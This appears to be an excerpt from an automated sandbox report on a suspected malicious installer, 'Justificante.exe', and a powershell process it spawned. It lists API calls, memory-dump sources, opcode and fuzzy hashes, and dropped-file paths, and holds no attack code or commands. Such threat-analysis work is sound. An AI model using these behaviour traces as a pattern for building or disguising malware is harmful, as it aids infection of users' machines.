                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CapsCreateDeviceFontIndirectRelease
                          • String ID:
                          • API String ID: 3808545654-0
                          • Opcode ID: 384baed0899809c381ca3df955ec9033b844118511c6fdbdf6c0601521adad6e
                          • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                          • Opcode Fuzzy Hash: 384baed0899809c381ca3df955ec9033b844118511c6fdbdf6c0601521adad6e
                          • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                          APIs
                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout
                          • String ID: !
                          • API String ID: 1777923405-2657877971
                          • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                          • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                          • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                          • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
                          APIs
                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                          • lstrcatW.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405E33
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharPrevlstrcatlstrlen
                          • String ID: C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2659869361-297319885
                          • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                          • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                          • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                          • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                          APIs
                          • lstrlenA.KERNEL32(C:\Windows\baksendes), ref: 0040268D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: C:\ProgramData\bestializing\slagtehuset.spo$C:\Windows\baksendes
                          • API String ID: 1659193697-2972711647
                          • Opcode ID: c3dccd9a7efec03e354295f803ac17f7caea13d6d2d817f58da1960d721a6e0f
                          • Instruction ID: 5d79e66603f7cd29b77c79f3cf3d62822218e64012773efd3f53c153c7218f52
                          • Opcode Fuzzy Hash: c3dccd9a7efec03e354295f803ac17f7caea13d6d2d817f58da1960d721a6e0f
                          • Instruction Fuzzy Hash: EC112772A40204ABCB00AFB18E4EA9E73719F54708F21443FE402B61C1EAFD8991561F
                          APIs
                          • CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                          • CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                          Strings
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                          • C:\Users\user\AppData\Local\Temp\nsf81A1.tmp, xrefs: 00403B4F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsf81A1.tmp
                          • API String ID: 2962429428-1072142492
                          • Opcode ID: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
                          • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                          • Opcode Fuzzy Hash: aeccf91f195f98651a37afe53933e86c148d7decc5408070ba81ae1a3102e6a3
                          • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                          APIs
                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00405E63
                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030D4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante.exe,C:\Users\user\Desktop\Justificante.exe,80000000,00000003), ref: 00405E73
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: CharPrevlstrlen
                          • String ID: C:\Users\user\Desktop
                          • API String ID: 2709904686-2743851969
                          • Opcode ID: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                          • Instruction ID: 42216084ebed45f2f1fcdcce66f7b00f69915d90115442600aae12f46dcfca4c
                          • Opcode Fuzzy Hash: ca28fb495e832aca3bc5bc38fa8d5a1d536c38e2997e226eadf599fe90d3b243
                          • Instruction Fuzzy Hash: 65D05EB2401D209AC3226718DD04DAF73ACEF5134074A482AE582A61A4D7785E8186E8
                          APIs
                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                          • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                          • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1504554212.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1504539183.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504569385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504610033.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1504762697.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Justificante.jbxd
                          Similarity
                          • API ID: lstrlen$CharNextlstrcmpi
                          • String ID:
                          • API String ID: 190613189-0
                          • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                          • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                          • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                          • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: affe3a7d3c0ad269e74e08f55d9fe4a334a5cf3f70288906a2e7ff84312db232
                          • Instruction ID: 65f03a7a599663a9ea660354130fd1be2e8617c6cb4164c616a41dc17ad4c769
                          • Opcode Fuzzy Hash: affe3a7d3c0ad269e74e08f55d9fe4a334a5cf3f70288906a2e7ff84312db232
                          • Instruction Fuzzy Hash: A50370B0A00218DFE764DB58C850F9EB7B2AF89344F1085E9D50AAB744DB75EE81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47e91d9c8fab2ecd88dad7dbfb49ce22f0562846f71614c4082e63f9bde13a05
                          • Instruction ID: cb158d47b4f8b92165a595ccf1aaabc64573cd727260dcda734d342732210779
                          • Opcode Fuzzy Hash: 47e91d9c8fab2ecd88dad7dbfb49ce22f0562846f71614c4082e63f9bde13a05
                          • Instruction Fuzzy Hash: A00149B2B243614BE32163B88841BAD77639FC7650F1445AAC9125F381DE74EC4683D3
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7ece74ada4d292990254e54874b84b6ab70383a21b1a625ad0f54b348b6fa712
                          • Instruction ID: cd6661eb8d0136519bb86158ed37520b9eddcd7cf1ab07e5cec5d8778653a6d8
                          • Opcode Fuzzy Hash: 7ece74ada4d292990254e54874b84b6ab70383a21b1a625ad0f54b348b6fa712
                          • Instruction Fuzzy Hash: 09C2A1B0A00318DFE764DB68C850B9EB7B2EF88344F1085A9D81A6B745DB75ED81CF91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e29f03dfa92bdbd130c7ac66ce80e0dda86a1a0718a8f863de3580aae089a53
                          • Instruction ID: badc14b025a66cb348bff2d614da7c18bd4b5f1c65b6ca27802725cc422c0cd9
                          • Opcode Fuzzy Hash: 5e29f03dfa92bdbd130c7ac66ce80e0dda86a1a0718a8f863de3580aae089a53
                          • Instruction Fuzzy Hash: 1FA2D2B4A00254DFD764DB98C850BAEF7F2AF85340F10C5AAD55AAB340DB75EC81CB61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e69e46d5897646cf311a2f042264db9a10f5ef453ea00a26315043517edd5087
                          • Instruction ID: 5767acec69aa2f4721386b9516e1145a9b5099445712fcc1605d6f16da3ebccc
                          • Opcode Fuzzy Hash: e69e46d5897646cf311a2f042264db9a10f5ef453ea00a26315043517edd5087
                          • Instruction Fuzzy Hash: C4929DB0B00344DFD754CB98C854BA9B7B2BF85344F25816AE909AF385DBB6EC81CB51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbc3537eb0e012d00eb4e960acb0b88440201a1d2d4b24ed0b6d917b34c38652
                          • Instruction ID: 39eacad0ab64280488b6841ac124a947bcb1691e16188660606125ef413af6d0
                          • Opcode Fuzzy Hash: cbc3537eb0e012d00eb4e960acb0b88440201a1d2d4b24ed0b6d917b34c38652
                          • Instruction Fuzzy Hash: 6282D3B4A00254DFE764CB98C850FAEB3B2AF84340F10C5A9D95A6B741DBB5ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b7291bca82439a01dc4e4952db5382867b7ae4beb4655bd98ead94f4e07a647
                          • Instruction ID: fdad8acced195d92e1a1e1a2bb36c64e7d6ba78ba778aaffa0d6e84ab5442ccb
                          • Opcode Fuzzy Hash: 2b7291bca82439a01dc4e4952db5382867b7ae4beb4655bd98ead94f4e07a647
                          • Instruction Fuzzy Hash: 28729CB4A00254DFEB60CB98C850BAEF7B2AF84344F10C5AAD55A6B740DB75ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af1f72e3df7a7687c0e6ad3b60fab63f18cea91dd40fb0aeb62afa185a0fcff3
                          • Instruction ID: dba011ffc0fbe4a3c79ff3dc87c877870e022b41372ba04374deae4cdf5ea464
                          • Opcode Fuzzy Hash: af1f72e3df7a7687c0e6ad3b60fab63f18cea91dd40fb0aeb62afa185a0fcff3
                          • Instruction Fuzzy Hash: FB729CB4A00254DFEB60CB98C850BAEF7B2AF84344F10C5AAD55A6B740DB75ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 96a61db0f0f7df4654eaf1b1749155d5110657d32f6d720de2d5424b25e4d979
                          • Instruction ID: 8cef58214db49d01ca3ad84b18847d1476b02dac76010ffaf23a4b489a377257
                          • Opcode Fuzzy Hash: 96a61db0f0f7df4654eaf1b1749155d5110657d32f6d720de2d5424b25e4d979
                          • Instruction Fuzzy Hash: EF52CFB4A00254DFE720DB58C850FAEB7B2AF84344F10C5AAD95A6B740DBB5ED81CF61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 969ce4e3badb4ac54c288226daa67c1b963276dbdd1543dcea66766bad4bb92a
                          • Instruction ID: dcd0dc34e2d10acf31f12dc7792169db348da39dcc37f4b8d87b0f9ec8f902b2
                          • Opcode Fuzzy Hash: 969ce4e3badb4ac54c288226daa67c1b963276dbdd1543dcea66766bad4bb92a
                          • Instruction Fuzzy Hash: 8A329EB0B00248AFDB54CB98C440BAEB7F2AF89714F14C569E905AF391DB76ED41CB91
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c84f0d2ee91827d88a7febc84d4f8517f3d34fa5c55992105f6da84d2fb97cac
                          • Instruction ID: 1b3e1f565280513d9506947a6c7f08a1981686e2e9d00cc71e41ac17a6f8266e
                          • Opcode Fuzzy Hash: c84f0d2ee91827d88a7febc84d4f8517f3d34fa5c55992105f6da84d2fb97cac
                          • Instruction Fuzzy Hash: 19124DB0A00215DFEB60DB58C890FAEB7B2AF45344F0085EAD51AAB744DB75EE81CF51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41f1b4fc032816220dcf8119924609ea0cfb5ca89ed6f1ca77a37c000ea510a7
                          • Instruction ID: 0a670ef8efde163635e078c9e2d29356a8cbea6b764fe24dabab344ed484534b
                          • Opcode Fuzzy Hash: 41f1b4fc032816220dcf8119924609ea0cfb5ca89ed6f1ca77a37c000ea510a7
                          • Instruction Fuzzy Hash: EF123CB0A00215DFEB60DB58C890FAEB7B2AF45344F0085E9E51AAB744DB75EE81CF51
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2dc2197665f12084b55a84daea6d6c79f4f5ab6fc386af26ce29d7c13c29a01a
                          • Instruction ID: b0a031ad4aaf87b4ca4daaf14928d1590c7e38b96d74fb8dcc019566ce58f883
                          • Opcode Fuzzy Hash: 2dc2197665f12084b55a84daea6d6c79f4f5ab6fc386af26ce29d7c13c29a01a
                          • Instruction Fuzzy Hash: 437113B1B0021AEFDB549BF9D8007AEB7E1EF85211F14826AD856EB241FB31C945C7E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9c3e6a8e0174bb00cbe3fc9e36669b59749fa68d1e932a04bdfe41726e541bff
                          • Instruction ID: 2e8509e1f8b5c78d1749d106fee8db63d055415acd54180100aeb4f2f6b857a6
                          • Opcode Fuzzy Hash: 9c3e6a8e0174bb00cbe3fc9e36669b59749fa68d1e932a04bdfe41726e541bff
                          • Instruction Fuzzy Hash: F151487171434AAFDB618BE9C8007BBBBE2AF86211F14C17BE545CB291EA75CC40C7A1
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e6437b06ba5fa0ae8037dadfcc4d220284a8abfcabbb4d087e2333bd15a3e66
                          • Instruction ID: 4c5af188abcacd88afb6e68ca61dfa1358a120ee2c1112592d9b2a06a57cedbc
                          • Opcode Fuzzy Hash: 2e6437b06ba5fa0ae8037dadfcc4d220284a8abfcabbb4d087e2333bd15a3e66
                          • Instruction Fuzzy Hash: 795199B0A00305EFD754CB98C884BADBBB2BF85344F14856AE9199F391D776DC81CB61
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d52637625f5bad13b2ba3e429ecd5e298910f8c6319443f231a751ebc6b4a22
                          • Instruction ID: 9903ac2312c387f101d38257c9a306503a8d022403dac076dbda264a3f900432
                          • Opcode Fuzzy Hash: 5d52637625f5bad13b2ba3e429ecd5e298910f8c6319443f231a751ebc6b4a22
                          • Instruction Fuzzy Hash: A1318374B40214ABE704EBA8C851FAF76B3EF84340F548415E9066F791DEB6DD428BE1
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: af9a11dbbc49d9f34699604fbcd146e5e946b0744d5e6e0e1f720a07f7a7c931
                          • Instruction ID: da9e47f1a480be82ceda42edff88c5bb51eb22673b8224c325b8372b08d24378
                          • Opcode Fuzzy Hash: af9a11dbbc49d9f34699604fbcd146e5e946b0744d5e6e0e1f720a07f7a7c931
                          • Instruction Fuzzy Hash: 5D314CB7704252ABCB148AA494113BAB7B29FC2211F0C85BAD5528B391EF7BD942C761
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a741c14260612f4eff935bccfa88bf4099327b10e243291b824deabb399f10a8
                          • Instruction ID: b32cfacea8ea0faf6c4475422aa4d6bdf42578c54621df646d45a216e4147a56
                          • Opcode Fuzzy Hash: a741c14260612f4eff935bccfa88bf4099327b10e243291b824deabb399f10a8
                          • Instruction Fuzzy Hash: 1B2137B131439AABEB6457EA8840F7B72F69BC4611F34853AE546C7381DDB5C8418361
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 07fd73d0a39a04f1a2bd7e2d9e996de02f0a351478a67f7d559b7fc0c66212ec
                          • Instruction ID: 8a9c5e08f5e0df8e207a04f07978b37863a3d5d7f04958203c3a267323d85c02
                          • Opcode Fuzzy Hash: 07fd73d0a39a04f1a2bd7e2d9e996de02f0a351478a67f7d559b7fc0c66212ec
                          • Instruction Fuzzy Hash: E4216BB130031EBBEB6496E98850B3B72D6DFC4706F24853AE546EB781FE75D8418361
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8fd4251d9c3ebbccd9401a109a9a0cedad4479f7722678a837f6d157c147d8b3
                          • Instruction ID: 12e288dd8ef9cac7f9fae6695b9e43a2b0f0124045bc9e99ab951f5025aa9adb
                          • Opcode Fuzzy Hash: 8fd4251d9c3ebbccd9401a109a9a0cedad4479f7722678a837f6d157c147d8b3
                          • Instruction Fuzzy Hash: 2521BE7030434EBBE7A08AE58840B7677E5CF81701F188426E585EB2C2FA79DC41C371
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
